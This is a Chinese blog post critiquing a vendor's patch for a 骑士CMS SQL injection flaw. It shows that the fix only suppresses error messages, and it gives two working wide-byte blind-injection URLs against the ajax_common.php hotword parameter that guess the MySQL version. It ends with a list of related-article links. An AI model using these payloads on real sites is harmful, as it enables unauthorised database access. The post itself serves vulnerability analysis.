这个漏洞,我们看看骑士怎么修复的

http://wwwcto2uploudpic/Article/201412/359995.html

首先试试带入单引号,用宽字节试试,可以看到显示数据库出错

看看数据库怎么带入的吧

可以看到出错了,单引号被带入sql语句了

居然还可以注入,没有过滤

找到/include/mysql.class.php中最下面

function dbshow($err){if($err){$info = "Error:".$err;          }else{$info = "Errno:".$this->errno()." Error:".$this->error();}//exit($info);exit("数据库错误,请联系网站管理员!");}

只是把显错换成了数据库错误,请联系网站管理员!

这种修复方式我也是醉了,虽然是改了显错,但是我们的语句还是可以执行的,可以用盲注

http://127.0.0.1/upload1/plus/ajax_common.php?act=hotword&query=%88%ec%27%20||%20left(version(),1)%20between%200%20and%2050--%20a

这样猜解数据库版本第一位是0到5之间,返回内容

http://127.0.0.1/upload1/plus/ajax_common.php?act=hotword&query=%88%ec%27%20||%20left(version(),1)%20between%200%20and%2040--%20a

这样猜解数据库版本第一位是0到4之间,返回空白

因为mysql是5.0以上的版本

解决方案:

过滤

骑士cms最新全局SQL注入(官方奇葩修复案例)相关推荐

  1. asp.net 全局sql注入处理 sql关键字过滤 global过滤sql

    asp.net 全局sql注入处理 sql关键字过滤 global //当前请求对象private HttpRequest request;//当前响应对象private HttpResponse r ...

  2. SQL注入基础原理与案例(详细总结)

    SQL注入基础原理与案例 一.前言 二.漏洞概述及危害 1.漏洞概述 2.漏洞危害 3.漏洞防范 三.SQL注入 1.SQL注入方式 (1)信息收集 (2)数据注入 (3)高权限注入 2.判断是否存在 ...

  3. 最新dotCMS SQL注入漏洞 攻击者可获得敏感数据 绿盟科技发布安全威胁通告

    dotCMS 3.6.2以下版本可能存在SQL注入漏洞 ,绿盟科技发布<dotCMS SQL注入漏洞安全威胁通告>,通告全文如下 2017年2月15日,seclists.org网站发布了关 ...

  4. 【某CMS漏洞】SQL注入漏洞分析

    前言 这个CMS非常适合入门代码审计的人去学习,因为代码简单且漏洞成因经典,对一些新手有学习价值, 前台注入 从入口开始:/semcms/Templete/default/Include/index. ...

  5. %3c?php+eval,callback噩梦:解析著名CMS框架Drupal SQL注入漏洞

    *本文中涉及到的相关漏洞已报送厂商并得到修复,本文仅限技术研究与讨论,严禁用于非法用途,否则产生的一切后果自行承担. ‍ ‍‍‍FreeBuf科普‍‍ ‍‍ ‍‍Drupal是使用PHP语言编写的开源 ...

  6. SQL注入(使用sqli-labs案例以及sqlmap自动化注入工具)

    SQL注入: sqli-labs: 一个实验平台,里面有完整的SQL注入课程,需要phpstudy环境,因此先安装phpstudy环境 phpstudy: https://www.xp.cn/ 安装后 ...

  7. php sql漏洞修复,php sql注入漏洞与修复

    出于安全考虑,需要过滤从页面传递过来的字符. 通常,用户可以通过以下接口调用数据库的内容:URL地址栏.登陆界面.留言板.搜索框等. 轻则数据遭到泄露,重则服务器被拿下. 一.SQL注入的步骤 a) ...

  8. 如何修复会话固定漏洞_PHP安全漏洞:会话劫持,跨站点脚本,SQL注入以及如何修复它们...

    如何修复会话固定漏洞 PHP中的安全性 (Security in PHP) When writing PHP code it is very important to keep the followi ...

  9. 【SQL注入-13】利用SQL注入漏洞读写文件案例

    目录 1 读写文件的前提条件 1.1 secure-file-priv参数 1.1.1 作用 1.1.2 secure-file-priv参数值的查看 1.1.2.1 远程查看 1.1.2.2 本地查 ...

  10. SQL注入-05-防御修复建议

    SQL注入的防御 应用层防御 1.应用层防御的目标 (1)SQL注入的本质原因是应用层的问题 (2)SQL注入应用层防御的目标是修复SQL所有可能的漏洞,做好事前的防范 2.过滤SQL注入基本字符 ' ...

最新文章

  1. “战狼”无人直升机完成高原靶试
  2. 判断控件是否出现了滚动条
  3. 结对代码 复审 意见
  4. MySQL This function has none of DETERMINISTIC, NO SQL...错误1418 的原因分析及解决方法
  5. 4.Dynamics CRM 数据数量限制更改
  6. [转]Angular2 Material2 封装组件 —— confirmDialog确定框
  7. 查oracle执行的sql,oracle查询正在执行的sql
  8. mysql数据库关联查询慢_mysql数据库多表关联查询的慢SQL优化
  9. Ubuntu14.04+CUDA6.5+OpenCV2.4+Caffee配置
  10. 陪学网腾讯直播课堂开课啦~免费、免费、免费,重要的事情说三遍
  11. 电脑qq音乐显示无法代理服务器,电脑QQ音乐软件无法登录如何解决
  12. 项目分享| 自制巡线机器人
  13. word 尾注后边加致谢
  14. (三)lvs负载均衡详解--lvs-DR+keepalived配置
  15. 【动态规划】字符串编辑距离(Levenshtein距离)算法
  16. C语言实现动态通讯录(附带文件保存)
  17. 小红书话题笔记是什么意思?小红书话题的形式有哪些?
  18. ISO8583报文128个域说明
  19. PLC脆弱性评估及相应解决方案
  20. 小白零基础教学:用自助BI工具搭建领导驾驶舱

热门文章

  1. pytorch —— 正则化之weight_decay
  2. 对待新知识、新领域的心态——好奇、批判、独孤求败
  3. 【钛媒体】社交网络广告怎么做才不让人反感?
  4. netbeans php下载,Netbeans7下载和安装
  5. 《开源安全运维平台--OSSIM最佳实践》节日期间当当自营店 五折 优惠活动开始啦!...
  6. 【谷粒商城 - k8s、devOps专栏】
  7. html页面内容不可复制粘贴,教你如何解决网页不能复制粘贴的问题
  8. 数据结构第5版李春葆上机实验题答案(全部)
  9. Relay和Rendezvous
  10. IT冷知识(持续更新中)